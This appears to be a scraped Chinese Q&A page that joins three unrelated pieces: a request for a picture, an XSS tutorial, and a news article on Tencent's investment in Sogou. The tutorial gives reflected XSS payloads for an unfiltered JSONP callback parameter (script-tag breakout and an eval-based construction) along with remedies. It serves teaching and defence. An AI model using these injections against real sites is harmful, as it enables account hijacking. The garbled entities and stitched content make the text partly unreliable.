您还未登陆，请登录后操作！
悬赏20爱心点
分享到微博
请选择登录方式
谁能找到这张完整的图片
&&X战记&&的一照片 但找不到完整的 帮我一下好吗???
<img onerror="imgDelByClass('comimg_box');" class="piczoom mpic" alt="这是日本
这里是图片文件来源.应该可以打开.
因为原图很大,我没办法直接放上来.我传去资料库了.
大家还关注那些年我们一起学XSS - 2. 输出在&script&&/script&之间的情况
接着上面一个教程，我们继续。这个例子属于第一例的特殊情况，当然也有特殊解法。也属于非常常见的一种情况。
1. 我们找到这么一个点，也是输入和输出都未过滤的一个点。相比教程第一例，其特殊之处在于，是输出在了 &script&[输出]&/script&之间。
/common/setParentsInfo.php?callback=aaaaaaaaa
如下图：callback参数未做过滤。 在【查看源代码】下，我们可以看到。
缺陷网页源代码:
&script type=&#39;text/javascript&#39;&document.domain=&#&#39;;_ret={&_res&:2};try{parent.aaa(_ret);}catch(err){aaa(_ret);}&/script&
2. 碰到这种情况，我们一般有以下解法。
2.1 首先判断，是否过滤了 & , & , / 等符号，
2.2 如果都没有过滤，恭喜你，一般可以直接XSS了。代码如下：
/common/setParentsInfo.php?callback=aaaaaaaaa&/script&&script&alert(1)&/script&
原理入下图：
构造callback参数后的源代码
&script type=&#39;text/javascript&#39;&document.domain=&#&#39;;_ret={&_res&:2};try{parent.aaaaaaaaa&/script&&script&alert(1)&/script&(_ret);}catch(err){aaaaaaaaa&/script&&script&alert(1)&/script&(_ret);}&/script&
2.3 如果过滤了 &, &，那么就无法使用上面的办法了。我们接着看 3
3. script代码里的构造。
友情提示：这里可能需要一点点 javascript 的知识才行哦～～
我们可以如下构造：
/common/setParentsInfo.php?callback=eval(&#39;alert(1)&#39;);void
可以看到，源代码是下面的样子。
也就是说，我们插入的内容，使得这一段javascript依然【语法正确】，能够【正确执行】，并且能够执行【我们所插入的JS代码】，这样我们的目的就达到了。
构造后的源代码如下：
&script type=&#39;text/javascript&#39;&document.domain=&#&#39;;_ret={&_res&:2};try{parent.eval(&#39;alert(1)&#39;);void(_ret);}catch(err){eval(&#39;alert(1)&#39;);void(_ret);}&/script&
4. 这种输出在JS代码里的情况十分常见，但是呢？不幸的是，像这样没过滤的情况，却不是很常见。例如：
var a=&[输出]&; // 通常程序员会把 & 过滤掉， 这样的话，一般来说，我们就很难构造。
但是，这并不是说，就一定是不能利用，后面我们会拿腾讯一些【比较有意思】的例子，来进一步说到 这个【输出在js里】的情况的～&
修复方案：
这类XSS的模型通常是：
&script&...[输出]...&/script&
&style&...[输出]...&/script&
解决方案：
1. 过滤 &/xxx& 组合
2. 针对输出在不同的场景，进行合适的过滤。
您对本文章有什么意见或着疑问吗？请到您的关注和建议是我们前行的参考和动力&&
您的浏览器不支持嵌入式框架，或者当前配置为不显示嵌入式框架。中国电信手机杂志
腾讯收购搜狗股份的背景
&p&　　美国纽约时报：又一笔巨大投资加剧了中国互联网巨头之间争夺主导权的竞争。中国最大的互联网公司腾讯控股周一宣布，该公司已注资4.48亿美元（约合27.4亿元人民币）收购了搜索引擎搜狗36.5%的股份。腾讯提供热门互联网游戏、社交网络和互联网聊天等服务，这笔投资让腾讯能与其主要竞争对手阿里巴巴和百度保持同步，那两家公司都在进行各自的交易以挑战腾讯。&/p& &p&　　随着中国互联网继续迅速发展，公司资产的规模也在增加。本周，腾讯的股票市值上升到超过1000亿美元的总额，比Facebook的市值仅低几十亿。与其主要竞争对手一样，腾讯主要瞄准中国市场，虽然公司也一直在尝试往国际上扩张。&/p& &p&　　搜狗归搜狐公司所有，在中国的搜索引擎中只排名第三，根据调查公司CNZZ的数据，搜狗在8月份的搜索市场份额占有率为10%。百度遥遥领先，占有率为63%，之后是奇虎360，占有率为18%。&/p& &p&　　尽管如此，腾讯、奇虎和阿里巴巴都在设法获得搜狗。阿里巴巴和腾讯之间的竞争一直很激烈，最近几个月双方都在扩大各自的互联网服务范围以期超过对方。&/p& &p&　　腾讯的QQ和微信等聊天服务快速增长，在移动设备上具有优势，而直到最近，该公司在电子商务等方面缺乏实力。而阿里巴巴虽然是中国电子商务的领军者，但在搜索和移动服务方面却相对较弱。&/p& &p&　　8月份，阿里巴巴采取行动，禁止其网站上的零售商使用微信服务，该服务已成为一个强大的营销工具。其后，腾讯给微信增加了网上支付功能。&/p& &p&　　分析人士说，腾讯与搜狗联手，与其说是为了不让阿里巴巴开辟新领地，更有可能是为了保住自己的现有地盘。&/p& &p&　　弗雷斯特研究公司(Forrester Research)分析师王平(Bryan Wang)说，&腾讯不会让阿里巴巴得到一个搜索引擎。这只不过是买下可能会对竞争对手大有裨益的东西。&&/p& &p&　　阿里巴巴在今年春天发出挑战，同意支付5.86亿美元收购新浪微博18%的股份，新浪微博是类似于Twitter的服务。这使阿里巴巴与腾讯的竞争更加直接，因为微博和微信相互争夺用户。随后阿里巴巴再次出手，给一家互联网地图公司高德软件投资2.94亿美元。&/p& &p&　　百度也不甘示弱，紧跟着做了中国互联网行业迄今最大的一笔交易，用19亿美元收购了经营移动应用软件商店的公司：91无线。&/p& &p&　　移动和电子商务业务一直增长迅速，搜索业务也仍在增长。根据咨询公司iResearch的数据，中国搜索业务带来的收入比一年前增长了35%。该公司称，在92.8亿元人民币的季度总收入中，百度占有81%，搜狗只占3.3%，搜狗的收入占有率，比其在搜索市场的份额占有率要小得多。&/p& &p&　　搜狐总裁张朝阳说，&与腾讯的战略合作将扩大搜狗的市场占有率，提升搜狗在竞争激烈的PC搜索市场，以及快速发展的移动搜索市场上的领先地位。&&/p& &p&　　在周一的宣布发出之前，奇虎360被认为是最有可能收购搜狗部分或者全部股份的公司。这两家公司的高管都曾承认他们在举行谈判。&/p& &p&　　腾讯称，根据其与搜狐达成的协议，腾讯可以将其持有的搜狗股份增加到&约40%&。腾讯计划要将其旗下的搜索引擎搜搜与搜狗合并，这两家公司称，他们将合作开发新服务。&/p& &p&　　腾讯总裁马化腾在一次新闻发布会上说，&我们相信搜狗和搜搜合并之后，将会在腾讯的社交、浏览器和内容平台，特别是在移动端为用户提供更好的搜索体验。&&/p& &p&　　过去一年多，中国互联网领域中并购一直很活跃，而百度、腾讯、阿里巴巴这样的互联网大公司是主要的买家。&/p& &p&　　风险投资基金投资的项目无法在美国市场上市、更倾向被并购而实现退出，这是中国互联网界这轮并购高潮的推动力之一。美国是中国互联网公司的主要上市地，这两年由于股市波动剧烈以及中概股危机等因素，成功赴美上市的互联网公司数量极少。但中国互联网市场发生的结构性变化，才是当下这轮并购潮产生的根本性原因。一方面中国互联网企业靠人口红利增长的时代已经结束，并购是中国互联网巨头扩张业务、保持增长的重要手段；另一方面，百度、腾讯、阿里巴巴这些互联网也希望能借力收购布局移动互联网。&/p& &p&　　2005年到2010年，是中国互联网的黄金时期，根据中国互联网络信息中心(China Internet Network Information Center，CNNIC)的统计，2005年，中国互联网用户只有1.1亿；但到2010年已经达到4.57亿。这意味着只要抓住一个需求热点，就能迅速获得大量用户，其间搜索、电子商务、社交网络和网络游戏的受欢迎，造就了百度、阿里巴巴和腾讯成为中国互联网的三大巨头，中国互联网界和媒体界称它们为&蝙蝠&（BAT，取百度、阿里巴巴、腾讯英文名字首字母）。&/p& &p&　　但2010年之后，中国互联网用户的增长出现明显放缓，导致单纯依靠用户规模增长的&人口红利&业务模式，很难再维持公司的高增长。同样来自CNNIC的数据，2011年，中国网民同比仅增长了12%；而2012年中国网民人数相比2011年，则仅增长了9.94%。腾讯创始人马化腾在2007年接受《中国企业家》采访时就表示，当中国网民达到3亿后，传统的增长模式就可能放缓。而截至2008年底，中国网民人数为2.98亿。&/p& &p&　　于是，在2010年前后，腾讯率先举起了收购和投资大棒。 根据《福布斯》中文版2011年的文章《投资家腾讯》，2010年至2011年上半年，腾讯共计投入了十多亿美元（比之前的所有时间都多）、在全球范围内投资了十几家公司，其中最著名的就是对Facebook股东DST和美国游戏公司Riot Games的投资，投资金额都超过了3亿美元。为此，腾讯成立了一支100亿元人民币的投资基金；它在美国硅谷也是一个活跃的投资者，该公司联席CTO熊明华全职负责当地投资事宜。&/p& &p&　　并购对腾讯、阿里巴巴和百度这三大中国互联网公司而言，是必然选择，因为它们的市场至今仍主要在国内，所以围绕核心做并购、切入其他细分市场才能找到新的增长空间。&/p& &p&　　【点评】事实上这几个打并购战的互联网巨头腾讯、百度、搜狐等公司的上市地都在美国，如果它们在内地上市就有与美国股市完全不一样的企业战略，而目的都一样，保住甚至提升股价水平，体现了企业的发展价值，也令企业发起人自身的财富数字至少不缩水。美国市场与中国市场的游戏规则大不一样，在中国股市，需要不断的题材并且配合大势为股价推高而造势，在大牛市或者大熊市中，垃圾股与绩优股共同进退，业绩之类的理论硬指标多半要服从大势的力量，业绩好的公司的股票在大熊市中（比如最近几年的单边下滑）往往会感觉很委屈，在大牛市中，毫无业绩可言的公司的垃圾股极有可能笑逐颜开，甚至迎来涨停板之类的大喜（因为垃圾股有可能因为盘子小容易拉高和打压）。美国股市也看大势，但无论牛市还是熊市，上市公司的素质和业绩还是核心的股价元素，比如微软、苹果这样的大牛公司，尽管盘子大、股价高，但在熊市中抗跌，在牛市中也抢眼，参与的投资者往往颇有收获，特别是所谓长线投资者，一般不会吃亏，在美国股市，题材对大牛公司也很重要，关键数据的变化和重大事项（比如人事变动、经营丑闻之类）将导致股价剧烈波动。总体上，美国股市对上市公司的业绩表现和经营数据非常敏感，对信息披露的事后监督也比较严苟，中国的一些赴美上市公司因此颇为不适应，在上次的会计数据造假风波后撤出美国股市。腾讯、百度、搜狐三巨头在中国互联网市场的表现各有千秋，腾讯的游戏、聊天、百度的搜索都是强势项目，如果通过并购获得更多的优质项目，将会在美国市场给投资者更好的印象。&/p&
广东电信版权所有 &copy 2009